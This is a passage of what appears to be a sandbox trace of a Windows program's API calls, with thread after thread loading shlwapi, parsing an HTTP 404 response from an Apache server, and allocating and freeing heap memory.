returned 0x6a0000 [0249.213] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 380 os_tid = 0x1554 [0249.433] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0249.434] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:36 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0249.434] GetProcessHeap () returned 0x6a0000 [0249.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be7d8 [0249.434] GetProcessHeap () returned 0x6a0000 [0249.434] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be7d8 | out: hHeap=0x6a0000) returned 1 [0249.434] GetProcessHeap () returned 0x6a0000 [0249.435] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 381 os_tid = 0x1558 [0249.648] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0249.648] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:36 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0249.648] GetProcessHeap () returned 0x6a0000 [0249.648] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb50 [0249.648] GetProcessHeap () returned 0x6a0000 [0249.648] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb50 | out: hHeap=0x6a0000) returned 1 [0249.648] GetProcessHeap () returned 0x6a0000 [0249.649] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 382 os_tid = 0x155c [0249.879] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0249.880] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:36 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0249.880] GetProcessHeap () returned 0x6a0000 [0249.880] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb50 [0249.880] GetProcessHeap () returned 0x6a0000 [0249.880] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb50 | out: hHeap=0x6a0000) returned 1 [0249.880] GetProcessHeap () returned 0x6a0000 [0249.881] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 383 os_tid = 0x1560 [0250.065] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0250.065] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:37 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0250.065] GetProcessHeap () returned 0x6a0000 [0250.065] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb50 [0250.066] GetProcessHeap () returned 0x6a0000 [0250.066] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb50 | out: hHeap=0x6a0000) returned 1 [0250.066] GetProcessHeap () returned 0x6a0000 [0250.066] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 384 os_tid = 0x1564 [0250.304] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0250.305] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:37 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0250.305] GetProcessHeap () returned 0x6a0000 [0250.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be9e8 [0250.305] GetProcessHeap () returned 0x6a0000 [0250.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be9e8 | out: hHeap=0x6a0000) returned 1 [0250.306] GetProcessHeap () returned 0x6a0000 [0250.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 385 os_tid = 0x1568 [0250.540] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0250.540] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:37 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0250.540] GetProcessHeap () returned 0x6a0000 [0250.540] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb50 [0250.540] GetProcessHeap () returned 0x6a0000 [0250.540] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb50 | out: hHeap=0x6a0000) returned 1 [0250.540] GetProcessHeap () returned 0x6a0000 [0250.541] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 386 os_tid = 0x156c [0250.715] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0250.715] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:37 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0250.716] GetProcessHeap () returned 0x6a0000 [0250.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be9e8 [0250.716] GetProcessHeap () returned 0x6a0000 [0250.716] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be9e8 | out: hHeap=0x6a0000) returned 1 [0250.716] GetProcessHeap () returned 0x6a0000 [0250.716] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 387 os_tid = 0x1570 [0251.032] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0251.033] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:38 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0251.033] GetProcessHeap () returned 0x6a0000 [0251.033] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be9e8 [0251.033] GetProcessHeap () returned 0x6a0000 [0251.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be9e8 | out: hHeap=0x6a0000) returned 1 [0251.033] GetProcessHeap () returned 0x6a0000 [0251.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 388 os_tid = 0x1574 [0251.350] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0251.350] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:38 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0251.350] GetProcessHeap () returned 0x6a0000 [0251.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb50 [0251.350] GetProcessHeap () returned 0x6a0000 [0251.350] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb50 | out: hHeap=0x6a0000) returned 1 [0251.350] GetProcessHeap () returned 0x6a0000 [0251.351] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 389 os_tid = 0x1578 [0251.561] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0251.562] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:38 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0251.562] GetProcessHeap () returned 0x6a0000 [0251.562] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb50 [0251.562] GetProcessHeap () returned 0x6a0000 [0251.562] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb50 | out: hHeap=0x6a0000) returned 1 [0251.562] GetProcessHeap () returned 0x6a0000 [0251.563] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 390 os_tid = 0x157c [0251.792] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0251.793] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:38 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0251.793] GetProcessHeap () returned 0x6a0000 [0251.793] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb50 [0251.793] GetProcessHeap () returned 0x6a0000 [0251.793] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb50 | out: hHeap=0x6a0000) returned 1 [0251.793] GetProcessHeap () returned 0x6a0000 [0251.793] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 391 os_tid = 0x1580 [0251.974] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0251.975] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:38 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0251.975] GetProcessHeap () returned 0x6a0000 [0251.975] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6beb50 [0251.975] GetProcessHeap () returned 0x6a0000 [0251.975] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb50 | out: hHeap=0x6a0000) returned 1 [0251.975] GetProcessHeap () returned 0x6a0000 [0251.976] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 392 os_tid = 0x1584 [0252.286] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0252.287] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:39 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0252.287] GetProcessHeap () returned 0x6a0000 [0252.287] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be9e8 [0252.287] GetProcessHeap () returned 0x6a0000 [0252.287] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be9e8 | out: hHeap=0x6a0000) returned 1 [0252.287] GetProcessHeap () returned 0x6a0000 [0252.288] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 393 os_tid = 0x1588 [0252.458] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0252.459] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:39 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0252.459] GetProcessHeap () returned 0x6a0000 [0252.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be9e8 [0252.459] GetProcessHeap () returned 0x6a0000 [0252.459] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be9e8 | out: hHeap=0x6a0000) returned 1 [0252.459] GetProcessHeap () returned 0x6a0000 [0252.460] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 394 os_tid = 0x158c [0252.673] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0252.674] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:39 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0252.674] GetProcessHeap () returned 0x6a0000 [0252.674] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be7d8 [0252.674] GetProcessHeap () returned 0x6a0000 [0252.674] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be7d8 | out: hHeap=0x6a0000) returned 1 [0252.674] GetProcessHeap () returned 0x6a0000 [0252.674] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 395 os_tid = 0x1590 [0252.861] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0252.862] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:39 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0252.862] GetProcessHeap () returned 0x6a0000 [0252.862] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0252.862] GetProcessHeap () returned 0x6a0000 [0252.862] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0252.862] GetProcessHeap () returned 0x6a0000 [0252.862] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6720 | out: hHeap=0x6a0000) returned 1 Thread: id = 396 os_tid = 0x1594 [0253.075] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0253.075] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:40 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0253.076] GetProcessHeap () returned 0x6a0000 [0253.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0253.076] GetProcessHeap () returned 0x6a0000 [0253.076] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0253.076] GetProcessHeap () returned 0x6a0000 [0253.076] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9f18 | out: hHeap=0x6a0000) returned 1 Thread: id = 397 os_tid = 0x1598 [0253.377] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0253.381] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:40 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0253.381] GetProcessHeap () returned 0x6a0000 [0253.381] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be850 [0253.381] GetProcessHeap () returned 0x6a0000 [0253.381] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be850 | out: hHeap=0x6a0000) returned 1 [0253.381] GetProcessHeap () returned 0x6a0000 [0253.382] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 398 os_tid = 0x159c [0253.604] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0253.605] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:40 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0253.605] GetProcessHeap () returned 0x6a0000 [0253.605] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be7d8 [0253.605] GetProcessHeap () returned 0x6a0000 [0253.605] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be7d8 | out: hHeap=0x6a0000) returned 1 [0253.605] GetProcessHeap () returned 0x6a0000 [0253.605] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 399 os_tid = 0x15a0 [0253.838] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0253.840] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:40 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0253.841] GetProcessHeap () returned 0x6a0000 [0253.841] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be7d8 [0253.841] GetProcessHeap () returned 0x6a0000 [0253.841] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be7d8 | out: hHeap=0x6a0000) returned 1 [0253.841] GetProcessHeap () returned 0x6a0000 [0253.841] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 400 os_tid = 0x15a4 [0254.098] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0254.099] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:41 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0254.099] GetProcessHeap () returned 0x6a0000 [0254.099] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0254.099] GetProcessHeap () returned 0x6a0000 [0254.099] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0254.099] GetProcessHeap () returned 0x6a0000 [0254.099] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 401 os_tid = 0x15a8 [0254.352] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0254.352] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:41 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0254.352] GetProcessHeap () returned 0x6a0000 [0254.352] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be7d8 [0254.352] GetProcessHeap () returned 0x6a0000 [0254.352] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be7d8 | out: hHeap=0x6a0000) returned 1 [0254.352] GetProcessHeap () returned 0x6a0000 [0254.353] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 402 os_tid = 0x15ac [0254.566] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0254.566] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:41 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0254.566] GetProcessHeap () returned 0x6a0000 [0254.566] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be958 [0254.566] GetProcessHeap () returned 0x6a0000 [0254.566] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be958 | out: hHeap=0x6a0000) returned 1 [0254.566] GetProcessHeap () returned 0x6a0000 [0254.567] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c6f28 | out: hHeap=0x6a0000) returned 1 Thread: id = 403 os_tid = 0x15b0 [0254.774] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0254.775] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:41 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0254.775] GetProcessHeap () returned 0x6a0000 [0254.775] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0254.775] GetProcessHeap () returned 0x6a0000 [0254.775] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0254.775] GetProcessHeap () returned 0x6a0000 [0254.776] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9908 | out: hHeap=0x6a0000) returned 1 Thread: id = 404 os_tid = 0x15b4 [0255.021] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0255.021] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:41 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0255.021] GetProcessHeap () returned 0x6a0000 [0255.021] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0255.021] GetProcessHeap () returned 0x6a0000 [0255.021] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0255.021] GetProcessHeap () returned 0x6a0000 [0255.022] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9908 | out: hHeap=0x6a0000) returned 1 Thread: id = 405 os_tid = 0x15b8 [0255.225] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0255.225] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:42 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0255.225] GetProcessHeap () returned 0x6a0000 [0255.225] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0255.225] GetProcessHeap () returned 0x6a0000 [0255.225] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0255.225] GetProcessHeap () returned 0x6a0000 [0255.226] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9908 | out: hHeap=0x6a0000) returned 1 Thread: id = 406 os_tid = 0x15bc [0255.488] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0255.489] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:42 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0255.489] GetProcessHeap () returned 0x6a0000 [0255.489] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be7d8 [0255.489] GetProcessHeap () returned 0x6a0000 [0255.489] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be7d8 | out: hHeap=0x6a0000) returned 1 [0255.489] GetProcessHeap () returned 0x6a0000 [0255.489] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9908 | out: hHeap=0x6a0000) returned 1 Thread: id = 407 os_tid = 0x15c0 [0255.656] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0255.657] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:42 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0255.657] GetProcessHeap () returned 0x6a0000 [0255.657] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be898 [0255.657] GetProcessHeap () returned 0x6a0000 [0255.657] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be898 | out: hHeap=0x6a0000) returned 1 [0255.657] GetProcessHeap () returned 0x6a0000 [0255.657] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9908 | out: hHeap=0x6a0000) returned 1 Thread: id = 408 os_tid = 0x15c4 [0255.875] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0255.875] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:42 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0255.875] GetProcessHeap () returned 0x6a0000 [0255.875] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0255.875] GetProcessHeap () returned 0x6a0000 [0255.875] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0255.875] GetProcessHeap () returned 0x6a0000 [0255.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9908 | out: hHeap=0x6a0000) returned 1 Thread: id = 409 os_tid = 0x15c8 [0256.245] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0256.246] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:05:43 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0256.246] GetProcessHeap () returned 0x6a0000 [0256.246] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea90 [0256.246] GetProcessHeap () returned 0x6a0000 [0256.246] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea90 | out: hHeap=0x6a0000) returned 1 [0256.246] GetProcessHeap () returned 0x6a0000 [0256.247] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9908 | out: hHeap=0x6a0000) returned 1 Thread: id = 